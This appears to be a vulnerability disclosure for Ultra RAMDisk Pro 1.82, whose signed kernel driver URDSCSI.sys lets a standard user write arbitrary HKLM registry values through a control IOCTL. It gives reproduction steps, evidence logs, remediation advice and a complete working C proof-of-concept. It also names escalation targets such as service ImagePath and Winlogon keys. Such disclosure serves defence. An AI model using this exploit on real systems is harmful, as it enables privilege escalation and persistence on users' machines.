# Ultra RAMDisk Pro 1.82 Kernel Driver URDSCSI.sys Local Privilege Escalation via Arbitrary Registry Value Write ### **Summary** Ultra RAMDisk Pro installs a WHQL-signed kernel driver, `URDSCSI.sys`, that exposes a user-reachable control device at `\\.\UltraRAMDiskIOCTL`. A standard local user can send IOCTL `0x222B30` with command `0x08` to make the driver call `RtlCreateRegistryKey` and `RtlWriteRegistryValue` on caller-selected registry paths and values. The validation below used a benign test key under `HKLM\SOFTWARE\VendorRepro`. Direct registry writes by the standard user failed with `Access is denied`, but the same user wrote a unique marker value through the vendor driver. This proves a local registry DACL bypass from a standard Medium Integrity user. An unprivileged user can exploit an arbitrary registry value write primitive to achieve local privilege escalation under certain circumstances, such as overwriting service `ImagePath` or `FailureCommand` entries to redirect SYSTEM-level execution, injecting malicious paths into COM server registrations, or modifying autorun and Winlogon keys to establish persistent privileged code execution. ### **Affected Product and Version** - Product: Ultra RAMDisk Pro 1.82 WHQL - Installed application: `C:\Program Files (x86)\Ultra RAMDisk\UltraRAMDisk.exe` - Installed application SHA-256: `EB95CD6305171CEA4CED603F3230BB857F5AAB6BD553D3EFCDFC77A748657339` - Installed application version: `1.82` - Driver: `C:\Windows\System32\drivers\URDSCSI.sys` - Driver SHA-256: `C16DF6E011ACB960EF2342C509F861CAEB1940044257C2571CBF28FCC42231A9` - Driver version: `1.82` - Driver signature: Valid, `Microsoft Windows Hardware Compatibility Publisher` - Supporting bus driver: `C:\Windows\System32\drivers\URDBus.sys` - Supporting bus driver SHA-256: `F69263CE716416A8DB3DB50E4F5C5149EDD935008EA434BBAE3A74ED884670B0` ### **Download URL and SHA-256** - Download URL used: `https://blog.kakaocdn.net/dn/bPLCZJ/btsMWYgdSg1/H3d2IrXKdzv7lwmzxJwmuk/UltraRAMDisk-Pro-1.82-WHQL.exe?attach=1&knm=tfile.exe` - File name: `UltraRAMDisk-Pro-1.82-WHQL.exe` - Installer SHA-256: `CB438564A72B12D754F0D17B46E29899F6327B464D7024394EC877284DF995A2` - Installer signature: Valid, `ieungSoft (Taekwon Kim)` ### **Vulnerability Type** Local privilege boundary bypass / arbitrary registry value creation and write from kernel context. ### **Impact** A standard local user can write caller-controlled values under machine-wide registry hives such as `HKLM`, bypassing normal registry ACLs. Depending on the target path and product configuration, this primitive may enable tampering with protected machine configuration or staging follow-on local privilege escalation. The proof below writes only to a controlled test key. ### **Test Environment** - OS: Windows 10 Pro, build `26200`, x64 - Attacker context: standard local user `win11\low` - Integrity level: Medium - Relevant group membership: `BUILTIN\Users`; no Administrators group membership - Test object: `HKLM\SOFTWARE\VendorRepro\UltraRAMDiskProof` Identity evidence: ```text User Name SID ========= ============================================ win11\low S-1-5-21-2301410722-4114373468-508074991-1001 BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Mandatory Level Label S-1-16-8192 ``` ### **Driver Load / Setup Steps** The product was installed using the vendor installer. The installer registered the WHQL driver package as `oem3.inf`: ```text Published Name: oem3.inf Original Name: urddriver.inf Provider Name: ieungSoft Class Name: System Driver Version: 12/25/2024 1.82.0.0 Signer Name: Microsoft Windows Hardware Compatibility Publisher ``` The relevant services were running: ```text SERVICE_NAME: URDBus TYPE : 1 KERNEL_DRIVER STATE : 4 RUNNING BINARY_PATH_NAME : \SystemRoot\System32\drivers\URDBus.sys LOAD_ORDER_GROUP : Extended Base DISPLAY_NAME : Ultra RAMDisk Bus Enumerator SERVICE_NAME: URDSCSI TYPE : 1 KERNEL_DRIVER STATE : 4 RUNNING BINARY_PATH_NAME : \SystemRoot\System32\drivers\URDSCSI.sys LOAD_ORDER_GROUP : SCSI Miniport DISPLAY_NAME : Ultra RAMDisk SCSI Controller ``` ### **Reproduction Steps** 1. Install Ultra RAMDisk Pro 1.82 WHQL. 2. Confirm `URDBus` and `URDSCSI` are running. 3. As Administrator, create a controlled test key: ```cmd reg add HKLM\SOFTWARE\VendorRepro\UltraRAMDiskProof /f ``` 4. As a standard user, confirm the control device is reachable: ```text [IDENTITY] win11\low OPEN OK \\.\UltraRAMDiskIOCTL ``` 5. As the same standard user, attempt a direct registry write: ```cmd reg add HKLM\SOFTWARE\VendorRepro\UltraRAMDiskProof /v DirectLowWrite /t REG_SZ /d SHOULD_NOT_WRITE /f ``` 6. As the same standard user, send the vendor-driver registry-write request: ```cmd ultraramdisk_urdscsi_registry_write_poc.exe --trigger --i-understand-registry-write --write-sz \Registry\Machine\SOFTWARE\VendorRepro\UltraRAMDiskProof DriverWrittenMarker2 ULTRARAMDISK-REG-MARKER-30b0f4a0-2272-4628-b16f-3c1eb32cee48 ``` 7. As Administrator, query the test key: ```cmd reg query HKLM\SOFTWARE\VendorRepro\UltraRAMDiskProof /v DriverWrittenMarker2 ``` ### ### **Baseline Evidence** The standard user could not directly write to the protected HKLM test key: ```text ERROR: Access is denied. ``` ### ### **Exploit Evidence** The same standard user sent IOCTL `0x222B30`, command `0x08`, to `\\.\UltraRAMDiskIOCTL`: ```text Opened target only after gates. Sending 1174-byte command 0x00000008 to IOCTL 0x00222b30. DeviceIoControl returned success, bytes=1174 ``` The registry value was created under HKLM with the exact marker supplied by the standard user: ```text HKEY_LOCAL_MACHINE\SOFTWARE\VendorRepro\UltraRAMDiskProof DriverWrittenMarker2 REG_SZ ULTRARAMDISK-REG-MARKER-30b0f4a0-2272-4628-b16f-3c1eb32cee48 ``` ### ### **Why This Proves the Vulnerability** The test user is a standard local user at Medium Integrity. Direct access to the protected HKLM key fails with `Access is denied`. The same user can open the vendor control device and submit a registry-write command. The driver then creates or writes the selected registry value from kernel context, bypassing the Windows registry ACL that blocked the direct write. Static analysis of `URDSCSI.sys` matches the live behavior: IOCTL `0x222B30` dispatches command `0x08` to a handler that parses a caller-supplied native registry key path, value name, registry type, and value data, then calls `RtlCreateRegistryKey` and `RtlWriteRegistryValue` without an authorization check or path restriction. ### **Cleanup Steps** Remove the controlled test key: ```cmd reg delete HKLM\SOFTWARE\VendorRepro\UltraRAMDiskProof /f ``` No reboot or shutdown was performed during validation. ### **Suggested Remediation** - Restrict `\\.\UltraRAMDiskIOCTL` so unprivileged users cannot access private driver-control IOCTLs. - Add explicit authorization checks before any registry-write operation. - Restrict registry writes to vendor-owned configuration keys only, if this functionality is required. - Avoid exposing general-purpose registry write primitives through `FILE_ANY_ACCESS` IOCTLs. ### **POC** The following minimal source builds the request used above. It is gated so no device is opened unless both `--trigger` and `--i-understand-registry-write` are supplied. ```c #define WIN32_LEAN_AND_MEAN #include #include #include #include #include #define IOCTL_ULTRARAMDISK_CONTROL 0x00222B30UL #define URD_CMD_REG_WRITE 0x00000008UL #define URD_REG_HEADER_SIZE 1052UL static int checked_wcs_copy(wchar_t *dst, size_t dst_chars, const wchar_t *src) { size_t n = wcslen(src); if (n >= dst_chars) return 0; memcpy(dst, src, (n + 1) * sizeof(wchar_t)); return 1; } static BYTE *build_request(const wchar_t *key, const wchar_t *value_name, DWORD type, const void *data, DWORD data_len, DWORD *out_len) { DWORD total = URD_REG_HEADER_SIZE + data_len; BYTE *buf = (BYTE *)calloc(1, total); if (!buf) return NULL; *(DWORD *)(buf + 0) = URD_CMD_REG_WRITE; if (!checked_wcs_copy((wchar_t *)(buf + 4), 260, key) || !checked_wcs_copy((wchar_t *)(buf + 524), 260, value_name)) { free(buf); return NULL; } *(DWORD *)(buf + 1044) = type; *(DWORD *)(buf + 1048) = data_len; memcpy(buf + URD_REG_HEADER_SIZE, data, data_len); *out_len = total; return buf; } int wmain(int argc, wchar_t **argv) { int trigger = 0, acknowledged = 0, argi = 1; while (argi < argc) { if (wcscmp(argv[argi], L"--trigger") == 0) { trigger = 1; argi++; } else if (wcscmp(argv[argi], L"--i-understand-registry-write") == 0) { acknowledged = 1; argi++; } else break; } if (!trigger || !acknowledged || argi + 3 >= argc || wcscmp(argv[argi], L"--write-sz") != 0) { fwprintf(stderr, L"usage: %ls --trigger --i-understand-registry-write --write-sz \n", argv[0]); return 1; } DWORD data_len = (DWORD)((wcslen(argv[argi + 3]) + 1) * sizeof(wchar_t)); DWORD req_len = 0; BYTE *req = build_request(argv[argi + 1], argv[argi + 2], REG_SZ, argv[argi + 3], data_len, &req_len); if (!req) return 1; HANDLE dev = CreateFileW(L"\\\\.\\UltraRAMDiskIOCTL", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (dev == INVALID_HANDLE_VALUE) { fwprintf(stderr, L"CreateFileW failed: %lu\n", GetLastError()); free(req); return 1; } DWORD bytes = 0; BOOL ok = DeviceIoControl(dev, IOCTL_ULTRARAMDISK_CONTROL, req, req_len, req, req_len, &bytes, NULL); if (!ok) fwprintf(stderr, L"DeviceIoControl failed: %lu\n", GetLastError()); else wprintf(L"DeviceIoControl returned success, bytes=%lu\n", bytes); CloseHandle(dev); free(req); return ok ? 0 : 1; } ```